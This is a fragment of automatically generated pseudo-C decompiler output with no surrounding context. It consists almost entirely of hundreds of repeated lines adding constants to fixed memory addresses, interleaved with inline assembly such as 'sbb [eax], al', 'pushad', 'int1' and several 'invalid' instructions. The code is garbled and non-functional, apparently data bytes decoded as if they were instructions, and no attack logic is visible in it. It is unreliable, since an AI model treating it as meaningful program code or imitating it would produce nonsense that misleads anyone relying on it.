				 *0x80004024 =  *0x80004024 + _t507;
				 *0x80004024 =  *0x80004024 + _t507;
				 *0x80004024 =  *0x80004024 + _t507;
				 *0x80004024 =  *0x80004024 + _t507;
				 *0x80004024 =  *0x80004024 + _t507;
				 *0x80004024 =  *0x80004024 + _t507;
				 *0x80004024 =  *0x80004024 + _t507;
				 *0x80004024 =  *0x80004024 + _t507;
				 *0x80004024 =  *0x80004024 + _t507;
				 *0x80004024 =  *0x80004024 + _t507;
				 *0x80004024 =  *0x80004024 + _t507;
				 *0x80004024 =  *0x80004024 + _t507;
				 *0x80004024 =  *0x80004024 + _t507;
				 *0x80004024 =  *0x80004024 + _t507;
				 *0x80004024 =  *0x80004024 + _t507;
				 *0x80004024 =  *0x80004024 + _t507;
				 *0x80004024 =  *0x80004024 + _t507;
				 *0x80004024 =  *0x80004024 + _t507;
				 *0x80004024 =  *0x80004024 + _t507;
				 *0x80004024 =  *0x80004024 + _t507;
				 *0x80004024 =  *0x80004024 + _t507;
				 *0x80004024 =  *0x80004024 + _t507;
				 *0x80004024 =  *0x80004024 + _t507;
				 *0x80004024 =  *0x80004024 + _t507;
				 *0x80004024 =  *0x80004024 + _t507;
				 *0x80004024 =  *0x80004024 + _t507;
				 *0x80004024 =  *0x80004024 + _t507;
				 *0x80004024 =  *0x80004024 + _t507;
				 *0x80004024 =  *0x80004024 + _t507;
				 *0x80004024 =  *0x80004024 + _t507;
				 *0x80004024 =  *0x80004024 + _t507;
				 *0x80004024 =  *0x80004024 + _t507;
				 *0x80004024 =  *0x80004024 + _t507;
				 *0x80004024 =  *0x80004024 + _t507;
				 *0x80004024 =  *0x80004024 + _t507;
				_t508 = _t507 + 1;
				 *0xFFFFFFFFD4008044 =  *((intOrPtr*)(0xffffffffd4008044)) + _t721;
				asm("sbb [eax], al");
				asm("sbb [eax], al");
				asm("pushad");
				asm("sbb [eax], al");
				 *0x80004024 =  *0x80004024 + _t508;
				 *0x80004024 =  *0x80004024 + _t508;
				 *0x80004024 =  *0x80004024 + _t508;
				 *0x80004024 =  *0x80004024 + _t508;
				 *0x80004024 =  *0x80004024 + _t508;
				 *0x80004024 =  *0x80004024 + _t508;
				 *0x80004024 =  *0x80004024 + _t508;
				 *0x80004024 =  *0x80004024 + _t508;
				 *0x80004024 =  *0x80004024 + _t508;
				 *0x80004024 =  *0x80004024 + _t508;
				 *0x80004024 =  *0x80004024 + _t508;
				 *0x80004024 =  *0x80004024 + _t508;
				 *0x80004024 =  *0x80004024 + _t508;
				 *0x80004024 =  *0x80004024 + _t508;
				 *0x80004024 =  *0x80004024 + _t508;
				 *0x80004024 =  *0x80004024 + _t508;
				 *0x80004024 =  *0x80004024 + _t508;
				 *0x80004024 =  *0x80004024 + _t508;
				 *0x80004024 =  *0x80004024 + _t508;
				 *0x80004024 =  *0x80004024 + _t508;
				 *0x80004024 =  *0x80004024 + _t508;
				 *0x80004024 =  *0x80004024 + _t508;
				 *0x80004024 =  *0x80004024 + _t508;
				 *0x80004024 =  *0x80004024 + _t508;
				 *0x80004024 =  *0x80004024 + _t508;
				 *0x80004024 =  *0x80004024 + _t508;
				 *0x80004024 =  *0x80004024 + _t508;
				 *0x80004024 =  *0x80004024 + _t508;
				asm("pushad");
				 *0x80004024 =  *0x80004024 & 0x80004024;
				 *0x80004024 =  *0x80004024 & _t508;
				asm("sbb [eax], al");
				_t723 = _t774;
				asm("sbb [eax], al");
				asm("pushad");
				asm("sbb [eax], al");
				 *0x80004024 =  *0x80004024 + _t508;
				 *0x80004024 =  *0x80004024 + _t508;
				 *0x80004024 =  *0x80004024 + _t508;
				 *0x80004024 =  *0x80004024 + _t508;
				 *0x80004024 =  *0x80004024 + _t508;
				 *0x80004024 =  *0x80004024 + _t508;
				 *0x80004024 =  *0x80004024 + _t508;
				 *0x80004024 =  *0x80004024 + _t508;
				 *0x80004024 =  *0x80004024 + _t508;
				 *0x80004024 =  *0x80004024 + _t508;
				 *0x80004024 =  *0x80004024 + _t508;
				 *0x80004024 =  *0x80004024 + _t508;
				 *0x80004024 =  *0x80004024 + _t508;
				 *0x80004024 =  *0x80004024 + _t508;
				 *0x80004024 =  *0x80004024 + _t508;
				 *0x80004024 =  *0x80004024 + _t508;
				 *0x80004024 =  *0x80004024 + _t508;
				 *0x80004024 =  *0x80004024 + _t508;
				 *0x80004024 =  *0x80004024 + _t508;
				 *0x80004024 =  *0x80004024 + _t508;
				 *0x80004024 =  *0x80004024 + _t508;
				 *0x80004024 =  *0x80004024 + _t508;
				 *0x80004024 =  *0x80004024 + _t508;
				 *0x80004024 =  *0x80004024 + _t508;
				 *0x80004024 =  *0x80004024 + _t508;
				 *0x80004024 =  *0x80004024 + _t508;
				 *0x80004024 =  *0x80004024 + _t508;
				 *0x80004024 =  *0x80004024 + _t508;
				 *0x80004024 =  *0x80004024 + _t508;
				 *0x80004024 =  *0x80004024 + _t508;
				 *0x80004024 =  *0x80004024 + _t508;
				 *0x80004024 =  *0x80004024 + _t508;
				 *0x80004024 =  *0x80004024 + _t508;
				 *0x80004024 =  *0x80004024 + _t508;
				 *0x80004024 =  *0x80004024 + _t508;
				 *0x80004024 =  *0x80004024 + _t508;
				 *0x80004024 =  *0x80004024 + _t508;
				 *0x80004024 =  *0x80004024 + _t508;
				 *0x80004024 =  *0x80004024 + _t508;
				 *0x80004024 =  *0x80004024 + _t508;
				 *_t697 = _t508;
				_t509 = _t508 + 1;
				 *((intOrPtr*)(0xffffffffd4008044)) =  *((intOrPtr*)(0xffffffffd4008044)) + _t723;
				asm("sbb [eax], al");
				_pop(_t724);
				asm("sbb [eax], al");
				asm("pushad");
				asm("sbb [eax], al");
				 *0x80004024 =  *0x80004024 + _t509;
				 *0x80004024 =  *0x80004024 + _t509;
				 *0x80004024 =  *0x80004024 + _t509;
				 *0x80004024 =  *0x80004024 + _t509;
				 *0x80004024 =  *0x80004024 + _t509;
				 *0x80004024 =  *0x80004024 + _t509;
				 *0x80004024 =  *0x80004024 + _t509;
				 *0x80004024 =  *0x80004024 + _t509;
				 *0x80004024 =  *0x80004024 + _t509;
				 *0x80004024 =  *0x80004024 + _t509;
				 *0x80004024 =  *0x80004024 + _t509;
				 *0x80004024 =  *0x80004024 + _t509;
				 *0x80004024 =  *0x80004024 + _t509;
				 *0x80004024 =  *0x80004024 + _t509;
				 *0x80004024 =  *0x80004024 + _t509;
				 *0x80004024 =  *0x80004024 + _t509;
				 *0x80004024 =  *0x80004024 + _t509;
				 *0x80004024 =  *0x80004024 + _t509;
				 *0x80004024 =  *0x80004024 + _t509;
				 *0x80004024 =  *0x80004024 + _t509;
				 *0x80004024 =  *0x80004024 + _t509;
				 *0x80004024 =  *0x80004024 + _t509;
				 *0x80004024 =  *0x80004024 + _t509;
				 *0x80004024 =  *0x80004024 + _t509;
				 *0x80004024 =  *0x80004024 + _t509;
				 *0x80004024 =  *0x80004024 + _t509;
				 *0x80004024 =  *0x80004024 + _t509;
				 *0x80004024 =  *0x80004024 + _t509;
				 *0x80004024 =  *0x80004024 + _t509;
				 *0x80004024 =  *0x80004024 + _t509;
				 *0x80004024 =  *0x80004024 + _t509;
				 *0x80004024 =  *0x80004024 + _t509;
				 *0x80004024 =  *0x80004024 + _t509;
				 *0x80004024 =  *0x80004024 + _t509;
				 *0x80004024 =  *0x80004024 + _t509;
				 *0x80004024 =  *0x80004024 + _t509;
				 *0x80004024 =  *0x80004024 + _t509;
				 *0x80004024 =  *0x80004024 + _t509;
				 *0x80004024 =  *0x80004024 + _t509;
				 *0x80004024 =  *0x80004024 + _t509;
				 *((intOrPtr*)(0xffffffffd4008044)) =  *((intOrPtr*)(0xffffffffd4008044)) + _t724;
				asm("sbb [eax], al");
				_pop(_t725);
				asm("sbb [eax], al");
				asm("pushad");
				asm("sbb [eax], al");
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *((intOrPtr*)(0xffffffffd4008044)) =  *((intOrPtr*)(0xffffffffd4008044)) + _t725;
				asm("sbb [eax], al");
				_pop(_t726);
				asm("sbb [eax], al");
				asm("pushad");
				asm("sbb [eax], al");
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *_t726 =  *_t726 + 0x23;
				 *((intOrPtr*)(0xffffffffd4008044)) =  *((intOrPtr*)(0xffffffffd4008044)) + _t726;
				asm("sbb [eax], al");
				_pop(_t727);
				asm("sbb [eax], al");
				asm("pushad");
				asm("sbb [eax], al");
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *_t727 =  *_t727 - 0x24;
				 *((intOrPtr*)(0xffffffffd4008044)) =  *((intOrPtr*)(0xffffffffd4008044)) + _t727;
				asm("sbb [eax], al");
				asm("sbb [eax], al");
				asm("pushad");
				asm("sbb [eax], al");
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				_push(0x80004024);
				 *0x80004024 =  *0x80004024 & 0x00000021;
				asm("sbb [eax], al");
				_t729 = _t774;
				asm("sbb [eax], al");
				asm("pushad");
				asm("sbb [eax], al");
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 = 0x80004024 +  *0x80004024;
				 *0x80004024 =  *0x80004024 + 0x21;
				asm("lock sub eax, 0x40");
				 *0x80004024 =  *0x80004024 + 0x21;
				 *((intOrPtr*)(_t729 + 0xffffffff00008048)) =  *((intOrPtr*)(_t729 + 0xffffffff00008048)) + _t729;
				asm("invalid");
				asm("invalid");
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + _t697;
				_push(0x80004024);
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				asm("int1");
				 *0x80004024 =  *0x80004024 & 0x80004024;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *_t748 = fs;
				 *_t697 =  *_t697 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *((intOrPtr*)(_t729 + _t748)) =  *((intOrPtr*)(_t729 + _t748)) + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *0x80004024 =  *0x80004024 + 0x21;
				 *((intOrPtr*)(_t748 + 0x10040)) =  *((intOrPtr*)(_t748 + 0x10040)) + _t697;
				 *0x80004024 =  *0x80004024 + 0x21;
				_t776 = (0x25 &  *0x80004024) + 8;
				_t521 = _t774 + 2;
				 *_t521 =  *_t521 + 0x21;
				 *_t521 =  *_t521 + 0x21;
				 *((intOrPtr*)(_t521 + 0x8004026)) =  *((intOrPtr*)(_t521 + 0x8004026)) + _t729;
				 *_t521 =  *_t521 + 0x21;
				 *((intOrPtr*)(_t748 + 0x2a0040)) =  *((intOrPtr*)(_t748 + 0x2a0040)) + _t729;
				_push(0xd4006c00);
				asm("daa");
				_t522 = _t521 + 1;
				 *((intOrPtr*)(_t522 + 0x5e)) =  *((intOrPtr*)(_t522 + 0x5e)) + 1;
				 *_t522 =  *_t522 + 0x21;
				 *_t522 =  *_t522 + 0x21;
				 *((intOrPtr*)(_t748 +  &_a29)) =  *((intOrPtr*)(_t748 +  &_a29)) + 2;
				 *((intOrPtr*)(_t729 + _t748)) =  *((intOrPtr*)(_t729 + _t748)) + _t729;
				_t523 = _t522 + 1;
				 *((intOrPtr*)(_t729 + _t748)) =  *((intOrPtr*)(_t729 + _t748)) + _t523;
				_t524 = _t523 + 1;
				 *_t524 =  *_t524 + 0x21;
				asm("adc eax, [eax]");
				_t525 = _t524 ^ 0x00000000;
				 *_t525 =  *_t525 + 0x21;
				_t527 = (_t525 ^ 0x00000032) + 1;
				 *_t697 =  *_t697 + 0x21;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 0x21;
				 *_t527 =  *_t527 + 0x21;
				 *_t527 =  *_t527 + 0x21;
				 *_t527 =  *_t527 + 0x21;
				 *_t527 =  *_t527 + 0x21;
				 *((intOrPtr*)(_t527 +  &_a64)) =  *((intOrPtr*)(_t527 +  &_a64)) + 1;
				 *((intOrPtr*)(_t527 + 0x31)) =  *((intOrPtr*)(_t527 + 0x31)) + _t729;
				asm("sbb eax, 0x40324400");
				 *_t697 =  *_t697 + 0x21;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 0x21;
				 *_t527 =  *_t527 + 0x21;
				asm("adc eax, [eax]");
				 *_t527 =  *_t527 + 0x21;
				_t529 = (_t527 ^ 0x00000032) + 1;
				 *_t748 =  *_t748 + 0x21;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 0x21;
				 *_t529 =  *_t529 + 0x21;
				 *_t529 =  *_t529 + 0x21;
				 *_t529 =  *_t529 + 0x21;
				 *_t529 =  *_t529 + 0x21;
				_t530 = _t529 + _t529;
				 *_t530 =  *_t530 - 0x21;
				if( *_t530 >= 0) {
					asm("sbb eax, 0x4032d400");
					 *_t748 =  *_t748 + 0x21;
					 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 0x21;
					 *_t530 =  *_t530 + 0x21;
					asm("adc eax, [eax]");
					 *_t530 =  *_t530 + 0x21;
					_t530 = (_t530 ^ 0x00000032) + 1;
					 *0x300 =  *0x300 + 0x21;
					 *_t530 =  *_t530 + 0x21;
					 *_t530 =  *_t530 + 0x21;
					 *_t530 =  *_t530 + 0x21;
					 *((intOrPtr*)(_t697 +  &_a64)) =  *((intOrPtr*)(_t697 +  &_a64)) + 0x21;
					 *((intOrPtr*)(_t530 + 0x31)) =  *((intOrPtr*)(_t530 + 0x31)) + _t729;
					asm("sbb eax, 0x4032e000");
					 *0x40000300 =  *0x40000300 + 0x21;
				}
				 *_t530 =  *_t530 + _t530;
				asm("adc eax, [eax]");
				_t531 = _t530 + 1;
				 *_t531 =  *_t531 + _t531;
				 *((intOrPtr*)(_t729 + _t748)) =  *((intOrPtr*)(_t729 + _t748)) + _t729;
				_t532 = _t531 + 1;
				 *((intOrPtr*)(_t532 + _t532)) =  *((intOrPtr*)(_t532 + _t532)) + _t532;
				_t533 = _t532 +  *_t532;
				 *_t533 =  *_t533 + _t533;
				 *_t533 =  *_t533 + _t533;
				 *_t533 =  *_t533 + _t533;
				 *_t533 =  *_t533 + _t533;
				_t534 = _t533 + 1;
				 *((intOrPtr*)(_t534 + 0x31)) =  *((intOrPtr*)(_t534 + 0x31)) + _t729;
				asm("sbb eax, 0x4032ec00");
				 *((intOrPtr*)(_t534 + _t534)) =  *((intOrPtr*)(_t534 + _t534)) + _t534;
				_t536 = _t534 +  *_t534 + 1;
				 *_t734 =  *_t734 + 2;
				 *((intOrPtr*)(_t536 + _t536)) =  *((intOrPtr*)(_t536 + _t536)) + _t536;
				_t538 = _t536 + 2 ^  *(_t536 + 2);
				asm("invalid");
				asm("invalid");
				 *_t538 =  *_t538 + _t538;
				 *_t538 =  *_t538 + _t538;
				 *_t538 =  *_t538 + _t538;
				 *_t538 =  *_t538 + _t538;
				_t540 = (_t538 | 0x0000002a) + 1;
				 *((intOrPtr*)(_t540 + 0x8001d31)) =  *((intOrPtr*)(_t540 + 0x8001d31)) + _t540;
				asm("invalid");
				asm("invalid");
				_t542 = (_t540 ^  *_t540) + 1;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + _t729;
				 *_t542 =  *_t542 + _t697;
				 *_t542 =  *_t542 + _t542;
				_t544 = (_t542 ^ 0x00000032) + 1;
				 *_t729 =  *_t729 + _t544;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + _t544;
				 *_t544 =  *_t544 + _t544;
				 *_t544 =  *_t544 + _t544;
				 *_t544 =  *_t544 + _t544;
				 *_t544 =  *_t544 + _t544;
				 *((intOrPtr*)(_t544 + 0x7000402a)) =  *((intOrPtr*)(_t544 + 0x7000402a)) + _t544;
				 *0x40331000 =  *0x40331000 ^ 2;
				 *_t729 =  *_t729 + _t544;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + _t544;
				 *_t544 =  *_t544 + _t544;
				asm("adc eax, [eax]");
				_t777 = _t776 - 1;
				 *_t544 =  *_t544 + _t544;
				 *((intOrPtr*)(_t729 + _t748)) =  *((intOrPtr*)(_t729 + _t748)) + _t729;
				_t545 = _t544 + 1;
				 *_t734 =  *_t734 + _t545;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + _t545;
				 *_t545 =  *_t545 + _t545;
				 *_t545 =  *_t545 + _t545;
				 *_t545 =  *_t545 + _t545;
				 *_t545 =  *_t545 + _t545;
				 *((intOrPtr*)(2 + _t757)) =  *((intOrPtr*)(2 + _t757)) + _t545;
				_t546 = _t545 + 1;
				 *((intOrPtr*)(_t546 + 0x31)) =  *((intOrPtr*)(_t546 + 0x31)) + _t729;
				asm("sbb eax, 0x40331c00");
				 *_t734 =  *_t734 + _t546;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + _t546;
				 *_t546 =  *_t546 + _t546;
				asm("adc eax, [eax]");
				_push(_t546);
				 *_t546 =  *_t546 + _t546;
				 *((intOrPtr*)(_t729 + _t748)) =  *((intOrPtr*)(_t729 + _t748)) + _t729;
				_t547 = _t546 + 1;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + _t547;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + _t547;
				 *_t547 =  *_t547 + _t547;
				 *_t547 =  *_t547 + _t547;
				 *_t547 =  *_t547 + _t547;
				 *_t547 =  *_t547 + _t547;
				 *((intOrPtr*)(_t547 + 0x2b)) =  *((intOrPtr*)(_t547 + 0x2b)) + _t697;
				_t548 = _t547 + 1;
				 *((intOrPtr*)(_t548 + 0x31)) =  *((intOrPtr*)(_t548 + 0x31)) + _t729;
				asm("sbb eax, 0x40332800");
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + _t548;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + _t548;
				_t730 = _t729 + _t697;
				_t549 = _t548 -  *_t548;
				if(_t549 != 0) {
					 *0xFFFFFFFFA800402F =  *((intOrPtr*)(0xffffffffa800402f)) + 2;
					_t641 = _t549 + 1 - 0x2db50040 + 1;
					_t730 = _t730 + _t641;
					_t645 = _t641 - 0x2dcf0040 + 1 - 0x2bd40040 + 1;
					_t697 = _t697 + _t697 + _t645;
					asm("sti");
					_t549 = _t645 -  *_t645 -  *((intOrPtr*)(_t645 -  *_t645));
					 *(_t549 + _t549 * 2) =  *(_t549 + _t549 * 2) | _t697;
					 *0x2200402c =  *0x2200402c + _t730;
				}
				 *_t730 =  *_t730 + _t549;
				 *_t734 =  *_t734 + _t697;
				 *((intOrPtr*)(_t777 + _t757)) =  *((intOrPtr*)(_t777 + _t757)) + 2;
				 *((intOrPtr*)(_t697 + 0x2c)) =  *((intOrPtr*)(_t697 + 0x2c)) + _t697;
